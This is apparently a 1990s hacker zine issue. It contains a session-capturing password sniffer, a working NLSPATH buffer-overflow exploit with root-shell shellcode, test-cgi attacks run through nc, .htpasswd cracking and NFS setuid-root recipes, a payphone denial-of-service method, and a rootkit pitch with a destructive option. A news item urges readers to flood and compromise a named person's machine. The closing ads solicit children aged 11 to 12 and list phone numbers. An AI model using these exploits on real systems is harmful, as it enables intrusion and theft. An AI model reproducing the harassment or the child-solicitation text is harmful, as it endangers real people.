#define IDLE_TIMEOUT 1800 #define IDLE_NODE() { \ time_t tm; \ time(&tm); \ if(LastTIMENext; \ if(CLe->Time ether_type); if(EtherType < 0x600) { EtherType = *(u_short *)(cp + SZETH + 6); cp+=8; pktlen-=8; } if(EtherType != ETHERTYPE_IP) /* chuk it if its not IP */ return; } /* ugh, gotta do an alignment :-( */ bcopy(cp + SZETH, (char *)Packet,(int)(pktlen - SZETH)); ip = (struct ip *)Packet; if( ip->ip_p != IPPROTO_TCP) /* chuk non tcp pkts */ return; tcph = (struct tcphdr *)(Packet + IPHLEN); if(!( (TCPD == IPPORT_TELNET) || (TCPD == IPPORT_LOGINSERVER) || (TCPD == IPPORT_FTP) )) return; { register struct CREC *CLm; register int length = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4)); register u_char *p = (u_char *)Packet; p += ((IPHLEN * 4) + (TCPOFF * 4)); if(debug) { fprintf(LOG,"PKT: (%s %04X) ", TCPflags(tcph->th_flags),length); fprintf(LOG,"%s[%s] => ", inet_ntoa(IPS),SERVp(TCPS)); fprintf(LOG,"%s[%s]\n", inet_ntoa(IPD),SERVp(TCPD)); } if( CLm = GET_NODE(IPS, TCPS, IPD, TCPD) ) { CLm->PKcnt++; if(length>0) if( (CLm->Length + length) < MAXBUFLEN ) { ADDDATA_NODE( CLm, p,length); } else { END_NODE( CLm, p,length, "DATA LIMIT"); } if(TCPFL(TH_FIN|TH_RST)) { END_NODE( CLm, (u_char *)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RST" ); } } else { if(TCPFL(TH_SYN)) { ADD_NODE(IPS,IPD,TCPS,TCPD,p,length); } } IDLE_NODE(); } } /* signal handler */ void death() { register struct CREC *CLe; while(CLe=CLroot) END_NODE( CLe, (u_char *)NULL,0, "SIGNAL"); fprintf(LOG,"\nLog ended at => %s\n",NOWtm()); fflush(LOG); if(LOG != stdout) fclose(LOG); exit(1); } /* opens network interface, performs ioctls and reads from it, * passing data to filter function */ void do_it() { int cc; char *buf; u_short sp_ts_len; if(!(buf=malloc(CHUNKSIZE))) Pexit(1,"Eth: malloc"); /* this /dev/nit initialization code pinched from etherfind */ { struct strioctl si; struct ifreq ifr; struct timeval timeout; u_int chunksize = CHUNKSIZE; u_long if_flags = NI_PROMISC; if((if_fd = open(NIT_DEV, O_RDONLY)) < 0) Pexit(1,"Eth: nit open"); if(ioctl(if_fd, I_SRDOPT, (char *)RMSGD) < 0) Pexit(1,"Eth: ioctl (I_SRDOPT)"); si.ic_timout = INFTIM; if(ioctl(if_fd, I_PUSH, "nbuf") < 0) Pexit(1,"Eth: ioctl (I_PUSH \"nbuf\")"); timeout.tv_sec = 1; timeout.tv_usec = 0; si.ic_cmd = NIOCSTIME; si.ic_len = sizeof(timeout); si.ic_dp = (char *)&timeout; if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCSTIME)"); si.ic_cmd = NIOCSCHUNK; si.ic_len = sizeof(chunksize); si.ic_dp = (char *)&chunksize; if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCSCHUNK)"); strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name)); ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0'; si.ic_cmd = NIOCBIND; si.ic_len = sizeof(ifr); si.ic_dp = (char *)𝔦 if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCBIND)"); si.ic_cmd = NIOCSFLAGS; si.ic_len = sizeof(if_flags); si.ic_dp = (char *)&if_flags; if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCSFLAGS)"); if(ioctl(if_fd, I_FLUSH, (char *)FLUSHR) < 0) Pexit(1,"Eth: ioctl (I_FLUSH)"); } while ((cc = read(if_fd, buf, CHUNKSIZE)) >= 0) { register char *bp = buf, *bufstop = (buf + cc); while (bp < bufstop) { register char *cp = bp; register struct nit_bufhdr *hdrp; hdrp = (struct nit_bufhdr *)cp; cp += sizeof(struct nit_bufhdr); bp += hdrp->nhb_totlen; filter(cp, (u_long)hdrp->nhb_msglen); } } Pexit((-1),"Eth: read"); } /* Authorize your proogie,generate your own password and uncomment here */ /* #define AUTHPASSWD "EloiZgZejWyms" */ void getauth() { char *buf,*getpass(),*crypt(); char pwd[21],prmpt[81]; strcpy(pwd,AUTHPASSWD); sprintf(prmpt,"(%s)UP? ",ProgName); buf=getpass(prmpt); if(strcmp(pwd,crypt(buf,pwd))) exit(1); } */ void main(argc, argv) int argc; char **argv; { char cbuf[BUFSIZ]; struct ifconf ifc; int s, ac=1, backg=0; ProgName=argv[0]; /* getauth(); */ LOG=NULL; device=NULL; while((acifr_name; } fprintf(ERR,"Using logical device %s [%s]\n",device,NIT_DEV); fprintf(ERR,"Output to %s.%s%s",(LOG)?LogName:"stdout", (debug)?" (debug)":"",(backg)?" Backgrounding ":"\n"); if(!LOG) LOG=stdout; signal(SIGINT, death); signal(SIGTERM,death); signal(SIGKILL,death); signal(SIGQUIT,death); if(backg && debug) { fprintf(ERR,"[Cannot bg with debug on]\n"); backg=0; } if(backg) { register int s; if((s=fork())>0) { fprintf(ERR,"[pid %d]\n",s); exit(0); } else if(s<0) Pexit(1,"fork"); if( (s=open("/dev/tty",O_RDWR))>0 ) { ioctl(s,TIOCNOTTY,(char *)NULL); close(s); } } fprintf(LOG,"\nLog started at => %s [pid %d]\n",NOWtm(),getpid()); fflush(LOG); do_it(); } 8. Linux nlspath exploit : Solar Designer /* * NLSPATH buffer overflow exploit for Linux, tested on Slackware 3.1 * by Solar Designer, 1997. */ #include #include #include char *shellcode = "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1" "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04" "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb" "\xcd\x80/" "/bin/sh" "0"; char *get_sp() { asm("movl %esp,%eax"); } #define bufsize 2048 char buffer[bufsize]; main() { int i; for (i = 0; i < bufsize - 4; i += 4) *(char **)&buffer[i] = get_sp() - 3072; memset(buffer, 0x90, 512); memcpy(&buffer[512], shellcode, strlen(shellcode)); buffer[bufsize - 1] = 0; setenv("NLSPATH", buffer, 1); execl("/bin/su", "/bin/su", NULL); } =============================================================================== ==[ FONES / SCANNING ]=========[ .SECTION C. ]===========[ FONES / SCANNING ]== =============================================================================== 1. How to fuck over a UK payphone : so1o / NightRage We found this out by total coincidence at the Bristol 2600 meeting... This is a DoS (Denial of Service) attack for payphones in the UK, it uses the national test number (175) and your local test number - at your local excahnge, which in Bristol is 17070 (I think), so you do the following... 1) Approach the telephone booth. 2) Pick up the handset. 3) Put 10p into the phone - you will get this back. 4) Dial your local excahnge test number. 5) Put the handset down. 6) Pick the handset up. 7) Dial your national exchange test number. 8) Listen to all the noise and shit for about 10 seconds. 9) Put the handset down. The LCD display in the booth will now say words to the following.. "BT Apologise, but this telephone is out of order." About 30 seconds later, the phone will return back to normal. 2. Radio link for TI-85 calculators : Michael Jan ******************************************************************** -- INTRO ----------------------------------------------------------- ******************************************************************** RT LINK (Radio transfer link) basicly functions like a regular TI-LINK except it is wireless! The parts for making this link will cost around $15 - $20 dollars for a pair, and the frequency is adjustable. You may post & share this plan. But please give me credit for my work (at least put my name, Michael Jan). I TESTED this plan, they transfer within the range of 30 to 50 feet. (Which is more than what I expected, great!). The following are the parts you need, you can obtain them at R.S. ******************************************************************** -- PARTS ----------------------------------------------------------- ******************************************************************** PARTS VALUE QUANTITY -------------------------------------------------------------------- TI LINK [TI BLACK LINK] 1 (Cut Into 2) Capacitors [470 pF] 2 [100 pF] 2 [10 pF] 2 [4 pF] 4 [.01 uF] 2 [10 uF] 4 Resistors [10K Ohm] 2 [1.2K Ohm] 2 [33K Ohm] 4 [100 Ohm] 2 [180 Ohm] 2 Transistors [2SC1923] 4 Coil(L) [.27-.3] 4 Battery Holder [Holds 2 AA or 2 AAA] 2 Batteries [AA or AAA] 4 Diode [Germanium] 2 Copper Wire [2 Feet] 2 (Ant.) ***************************************************************************** *** NOTE The Parts Are For TWO RT LINKs, Because They ONLY WORK In PAIRS! *** ***************************************************************************** ******************************************************************* -- DIRECTIONS ----------------------------------------------------- ******************************************************************* 1. Print Out The Schematic Diagram (The Included GIF File), It is Easier To Put Parts Together. 2. Put The Parts Together By Following The Diagram (VERY IMPORTANT). *** NOTE For Schematic Diagram -- Red Wire = From TI Link White Wire = From TI Link (Copper Wire From TI Link Will Not Be Use) R = Resistors C = Capacitors T = Transistors Connect +, - To Battery Holder 3. Adjust The 4 Coil(L)s Clockwise To MAX On Both RT Links. This Will Adjust The Frequences On Both LINKs To Be The Same. (You Can Adjust To Any Frequence You Like Between 90MHz-100MHz) 4. Put 2 Batteries Into Both Holders 5. THAT'S IT!!!, ENJOY YOU RT-LINK !!!! =) =============================================================================== ==[ MISC ]=====================[ .SECTION D. ]=======================[ MISC ]== =============================================================================== 1. Test-cgi holes : so1o Example exploit: ---------------- Below are examples, nc is netcat from avian.org. You can always just telnet to port 80 and type in the GET... command. machine% echo "GET /cgi-bin/test-cgi?/*" | nc removed.name.com 80 CGI/1.0 test script report: argc is 1. argv is /\*. SERVER_SOFTWARE = NCSA/1.4.1 SERVER_NAME = removed.name.com GATEWAY_INTERFACE = CGI/1.1 SERVER_PROTOCOL = HTTP/0.9 SERVER_PORT = 80 REQUEST_METHOD = GET HTTP_ACCEPT = PATH_INFO = PATH_TRANSLATED = SCRIPT_NAME = /bin/cgi-bin/test-cgi QUERY_STRING = /a /bin /boot /bsd /cdrom /dev /etc /home /lib /mnt /root /sbin /stand /sys /tmp /usr /usr2 /var REMOTE_HOST = remote.machine.com REMOTE_ADDR = 255.255.255.255 REMOTE_USER = AUTH_TYPE = CONTENT_TYPE = CONTENT_LENGTH = ...Or to see what other cgi-goodies are still floating around... machine% echo "GET /cgi-bin/test-cgi?*" | nc removed.name.com 80 CGI/1.0 test script report: argc is 1. argv is \*. SERVER_SOFTWARE = NCSA/1.4.1 SERVER_NAME = removed.name.com GATEWAY_INTERFACE = CGI/1.1 SERVER_PROTOCOL = HTTP/0.9 SERVER_PORT = 80 REQUEST_METHOD = GET HTTP_ACCEPT = PATH_INFO = PATH_TRANSLATED = SCRIPT_NAME = /bin/cgi-bin/test-cgi QUERY_STRING = calendar cgi-archie cgi-calendar cgi-date cgi-finger cgi-fortune cgi-lib.pl imagemap imagemap.cgi imagemap.conf index.html mail-query mail-query-2 majordomo majordomo.cf marker.cgi menu message.cgi munger.cgi munger.note ncsa-default.tar post-query query smartlist.cf src subscribe.cf test-cgi uptime REMOTE_HOST = remote.machine.com REMOTE_ADDR = 255.255.255.255 REMOTE_USER = AUTH_TYPE = CONTENT_TYPE = CONTENT_LENGTH = 2. Tree raping : digitalboy [DD] Tree raping can be an exciting and fulfilling hobby, as long as the proper safety precautions are taken. This file will try to outline the process of tree raping, as well as give you some background on the sport of tree raping. \|/ History \|/ Tree raping originated in Eastern Africa long before history was recorded. It was practiced by tribes of natives who used it as a test to determine the tribal chief. He who could rape the most trees was surely the most powerful, and therefore the rightful leader. The sexual molestation of trees was kept a tribal secret, and no outsiders learned of the practice until the late 1800's when Spanish explorer Hernando Ferdinando Enriquez happened to witness the event. He was killed by the natives he had been watching, but before his death he wrote of it in his journal. In 1937, a nun found the journal and the methods of tree raping were spread to the rest of the civilized world. \|/ Preparation \|/ Tree raping is not something you can just go out and do. You must be prepared. First and foremost, find a forest. While some of the best trees are found in urban settings, violating them will usually land you in the city jail. Not to mention the public ridicule. No, this is an activity that must take place in a relatively secluded part of a forest. Bring a few friends if that is your fancy, but large tree raping orgies usually lessen the enjoyment. You must also bring a large vat of maple syrup and possible climbing equipment, this will be explained later. \|/ Tree Selection \|/ Picking the right tree to violate is essential. If you pick the wrong tree, you could end up feeling inadequate, as well as inflicting serious physical injury upon yourself. Everyone has their own preference as to what type of tree to choose, but there are some general guidelines. The most vital factor you have to consider is the position of knotholes. If a knothole is not present, you may be forced to create your own. Any seasoned tree rapist always carries his trusty power drill. Also, be sure to measure the depth of the knothole. The texture of the bark is also important. Extremely rough bark can ruin your experience. Try to find a tree with smooth bark, such as a birch. Note that you are not limited to the part of the tree at ground level. Bring some climbing equipment and you can easily reach the desired level. \|/ The Act Of Tree Raping \|/ Tree raping always has and always must be done in complete nudity. Now, remember that you were required to bring along a vat of maple syrup. This object will now come into play. First, heat it to exactly 54.7 degrees Celsius. Next lift the syrup over your head and pour it over your body. Count to 112, then lie down and roll around on the forest floor. You are now ready to begin the ritual. Approach the tree you have picked while screaming "TSAK NARP FNORZA QKWT" as loud as possible. Penetrate the tree and proceed to violate it. Try to keep moving, the maple syrup can be a powerful bonding agent. When you are finished you will have to find your own method of removing the maple syrup. \|/ The End \|/ Avoid Pine trees AT ALL COSTS! 3. .htpasswd + .htaccess : Cain [DD] Well, I'm back. I should have put this article out last month, but I neglected to. Flames to /dev/null. Well anyway, you know how sometimes when you connect to a web page, you are asked for a username and password? Well, here's how that works. In a directory there is a file almost always called .htpasswd. And in another directory(or possibly that same one) there is a file called .htaccess. The .htpasswd file follows basically the same format as the /etc/passwd file: jblow:F#.DG*m38d%RF cain:GJA54j.3g9#$@f and the .htaccess file follows this format: AuthUserFile /path/to/.htpasswd require user If there is an .htaccess file in a directory, you must have a valid username and password to view any files in that directory. So here is what happens, the httpd sees the .htaccess file in the directory that you request a file from. It finds the location of the .htpasswd file and then find out who has access to the files in the directory. Therefore you must have a username and password. Well here's the bug: Only the files in the directory with the .htaccess file are passworded. So if the .htpasswd file is somewhere else (root directory maybe) then you can read that file. It uses the same form as /etc/passwd so therefore password crackers will work on this also. Insta hack if the webmaster doesn't know what he's doing. 4. Simple NFS skills : Cain [DD] You are searching around for a system to hack. One of the things you should check is whether they export any of the directories to everyone. Unfortunately you need a shell on the system to do this. But if you do, then this is an easy way to get root. Your local system: # showmount -r remote.com Export list for remote.com: /var/lib/stuff (everyone) # mount remote.com:/var/lib/stuff /mnt # cp hackprog /mnt # chown root.root /mnt/hackprog # chmod 4701 /mnt/hackprog # umount /mnt Their system: $ cd /var/lib/stuff $ hackprog bash# I chose the directories at random. But if you see anything like /path/to/exported/directory (everyone) in a showmount -r listing, you can mount that directory and have complete access(read, write, execute) to that directory. So if you put a rewting proggy: main() { setuid(0); setgid(0); system("/bin/sh"); } and make the owner root and chmod it to 4701(setuid) then you can run that program from the system exporting that directory and get a rewt shell. Unfortunately you must be root to mount an NFS, otherwise every system you got on, you could obtain a rewt shell. But oh well. =============================================================================== ==[ NEWS ]=====================[ .SECTION E. ]=======================[ NEWS ]== =============================================================================== 1. LOPHT.COM : so1o get into any shell, and type... % whois lopht.com its elite (lookup sIn inf0z to see) 2. AAA Report : so1o AAA stands for Access All Areas, it is a computer security and hacking conference held in the UK in early July of every year, this would be the third year of AAA, and myself and NightRage were going. Myself and NightRage arrived on Regent Street at 9:30am, we entered the University of Westminster building, purchased two passes for the event, and proceeded to the conference room, where there were many people aged between 16 and around 40, all with a handful of common interests, hacking, phreaking, carding and generally the ability to gain power, or "free stuff". We sat down on the ground floor near the back of the room, we got talking to a french hacker, called Leon (aka acme), we joked about "o-DaY WaReZ" and then Nightrage booted his p150 laptop, then Leon pulled out his Thinkpad, he booted it, and it counted up to 64mb of RAM, we asked how much hard drive space he had to which he casually replied "6 gig", Leon knew stuff. The first speaker was Ross Anderson, who explained how our predecessors had broken into cash machines (atm's) using various techniques, as well as the flaws in such machines and systems, ranging from all cards having the same PIN, to a trick that Shefield hackers used with phone cards to get cash. He then went on to smartcards and encryption and finished around 11am. We then went up to the network room, where the "hack the flag" competition was to be held, there were a handful of people up there, including a photgrapher and some staff, I only saw 3 systems and 2 terminals, not really enough to use for any competition. Leon sat down and started to toy with his laptop and some CD's he had purchased in Pakistan the day before, he had voice recognition programs and games and a few other "expensive" CD's. We met an American wearing an FBI cap, he also had a laptop, as well as another with long blonde / grayish hear who did alot of cool stuff with the phone line in the network room using various toys he had. We needed to set up a network, we had numerous modems, one network hub with 5 ports, around 8 systems and one phone socket. We soon realised through various methods (one using NightRage's cheap blue telephone) that the only phone socket in the room went through the reception, so NightRage phoned down to the reception, and tried to use his amazing social engineering skills.. Reception : "hello?" NightRage : "hi, is there any way I can get an outside line from this phone?" Reception : "no" NightRage : "OK" We then went on a hunt for working phone lines or hubs that we could use to help us set up our network, the FBI dude soon found a cabinet that looked important, and NightRage and the others helped him pick the lock, inside they found a 3com network hub and a few other goodies, the FBI dude got his laptop and tried to hack his way onto the network, but he couldn't use traceroute or any other programs, so that hub was useless to us unless we knew our own IP. Two younger hackers started to manually wardial the extensions, they found a handful of modem numbers in a very short amount of time. We were quite impressed by their skills. The guy with the long blond / grayish hair went down to a computer shop on Regent street to buy some RJ45 cable so we could use the hub in the cabinet, but he left before we realised that it wasn't usable. Emerson was getting really stressed out, as he was one of the staff, and he had promised the University that no damage would be done to any of the phone / computer lines, he needed a plan to stall us, even though we were telling him everything would be fine, and that we would leave all the stuff as it was when we found it, he was still scared at the consequences, and it was time for lunch, we originally planned to just pop over the street to grab a McDonalds, but Emerson started to take us down Regent street, he asked if we wanted to eat for around 5 at a place he knew well, we agreed, the time was around 1pm... Emerson proceeded to take myself, NightRage, the FBI dude, Wyatt and the two that had manually wardialled the extensions half way around London, we walked down Regent street, onto Tottenham court road and around a load of shops, Wyatt and the FBI dude suggested we should grab a beer, and we easily found a pub. We stopped into the pub and all ordered drinks, we then sat outside and talked about the L0phT, global posistioning and scanning, we left the pub at about 2pm and made our way through alot of roads and came to Kamamama's Japanese restaurant, after stopping into alot of shops on the way and talking about oki phones. We ate good Japanese food in Kamamama's, and Wyatt used his tiny scanner to detect radio comms within the building, his scanner was cool, and he tried to pinpoint the frequency that the waiters broadcast the orders with their handheld systems, at one point he placed the scanner right up next to the handheld and said "can you press that button one more time please". Wyatt also had a transciever that he could use to broadcast on, so he could pinpoint a frequency with his scanner, and the broadcast with his tiny transciever on that frequency. The time was now around 3pm, and we made our way back through a very busy London to the conference, when we got back we went back up to the network room, not alot had happened since we had been away (much as Emerson would have expected) and myself and NightRage toyed with systems for about 30 minutes We then listened to another talk by a journalist who often writes of hacking and computer security issues, called Dave Green (I think), Cold-Fire and the people on the balcony often questioned him, and he generally said "no-one cares what you do, so why should I write about it?" which was pretty true, then another journalist went on saying that he would pay for such stories if they had reason behind them (ie. web site attacks), this was quite interesting. The last talk myself and NightRage listened to was Alan Solomon, to which I asked, when he was talking about the Linux version of his toolkit... "Yeah, does the Linux version detect Windoze '95 as a virus?" He didn't understand, but he's cl00less and hangs on AOL all day... He then went on to talk a load of crap about how amazing AOL was, then he talked about how he has been mailbombed and how "phishers" have tried to pull all his account inf0z (passwords etc.) he was also shouting into the microphone, and I had a speaker right next to me, and I had my finger in one ear for most of the talk, due to the fact that he shouted into the microphone, he also breathed very heavily and walked around alot. We went back up to the network room, which now had 2 systems and 2 terminals, swapped email addresses with Wyatt, Emerson, the FBI dude and a few others, we then said our goodbyes, and left to catch the 8:30 train from Paddington Station. AAA was cool, it was just a pity that only one of the three planned special events actually took place, as well as the fact that there really wasn't enough time for the people there to talk with each other. 3. Lamer of the fucking year : pSId (DALnet) : so1o Theres a fucking cl00less g1mp on DALnet called pSId, but then again, most people on DALnet are cl00less, this "cracker" however has the following "mad" skills... - phf - tftp His most highly acclaimed hack was of sony.co.jp (guess the technique.) and since then he has blatently lied about hacking bolero.gsfc.nasa.gov (www.nasa.gov alias) which he says runs tftp. If you see him *anywhere* feel free to pingflood his IP, 0wn his lame fuck Linux box, or anything else. =============================================================================== ==[ PROJECTS ]=================[ .SECTION F. ]===================[ PROJECTS ]== =============================================================================== 1. STiK : mstrhelix -=STiK=- (S)olaris (T)ool (i)diot (K)it ****************************** STiK is a deluxe rootkit for the solaris platform containing not only tools that enable you to gain root access it also allows you to keep it with backdoors. The Alpha version of STiK includes exploits, backdoors, sniffers, connection hijackers, a stealth mode, and eventualy will also include other kewl tewls such as spoofers, other new inovative remote root access backdoors, and maybe if I have enough time a extra option to help you construct your own buffer overflow exploits. STiK supports these platforms... sparc10 and sparc20 and it minimaly supports x86 platforms. The only conflicts you may have while using this tool is if, (like an (i)diot) you use the -Sun4 switch on a solaris 5.x machine or say the -x86 swtich on a -Sun5 and visa versa... but nobody is that stupid. STiK includes the following options.... -Sun4, -Sol5, -x86 --> compiles exploits for following platforms. -backdrs --> installs backdoors and suggests 'em. -stealth --> does whut it says... and very well. -destruc --> if you get cauaght online reek some havok -man --> shows 3r33t manpage -Sun4 compiles loits for SunOS 4.x -Sol5 compiles loits for Solaris 2.5.x -x86 compiles loits for x86 platforms of solaris and sunos -backdrs backdoor menu feature,,, pick and choose or mix and match -stealth invokes programs such as cloak, zap2, block, and etc... -destruc if you get caught and booted this will invoke and fuck some shit up majorly. We dont wanna be destructive but hey !!!YOU FUCKING KICKED ME OFF YER MACHINE ASSHOLE I DIDN'T INVOKE THE -destruc FEATURE R00T DID!!! -man full featured reverse switched manpage to fuck wid yer headz If you'z mutha fuxx0rs have any shit you would like me to add so STiK then speak now or do without cause I have been hard at work coding shit... Also anyone who wants to help port lrk3 backdoors and shit to solaris drop me a line cause its a bitch doing it all by yerself... edge@mindwerks.com =============================================================================== ==[ FIN ]======================[ .SECTION G. ]========================[ FIN ]== =============================================================================== --------------------------------------+--------------------------------------- | YOUR SPECIAL AD | LET'S BE FREE | COULD BE RIGHT HERE #@! | Gay White Male 38, 5'11" looking | for men, 12 - 32 clean, fit, and SEND ELECTRONIC MAIL TO: | hairy. Discreet Encounters. ADZ@CODEZ.COM | Call Anytime : (816)781-8009 | (Ask for Tommy) | --------------------------------------+--------------------------------------- | ARE YOU 11 OR 12 ??? | FREE FONESEX! CALL ME NOW!@ | Looking for men 11 - 12 for adult | Yeah huney, you know you want me, video satisfaction. I am 35 into | I'll treat you just right, I'm Professional wrestling. | waiting for your call today! Let's talk soon : (816)453-8722 | CALL ME NOW!@# : (847)546-9154 | (Ask for Kim) --------------------------------------+--------------------------------------- .oO The CodeZero Oo. _ /| k0dek4t sez... \'o O' =(_o_)= "EyEm HuNGaRy FoR CoDeZ, U nOt CaTf00d!!#@" ::: http://insecurity.insecurity.org/codez/ ::: Remember, McDonalds Owns You, And Ronald Is The KinG!!! Wendy Is Satan!! Don't Believe The Lies!! PHEAR WENDY!@#*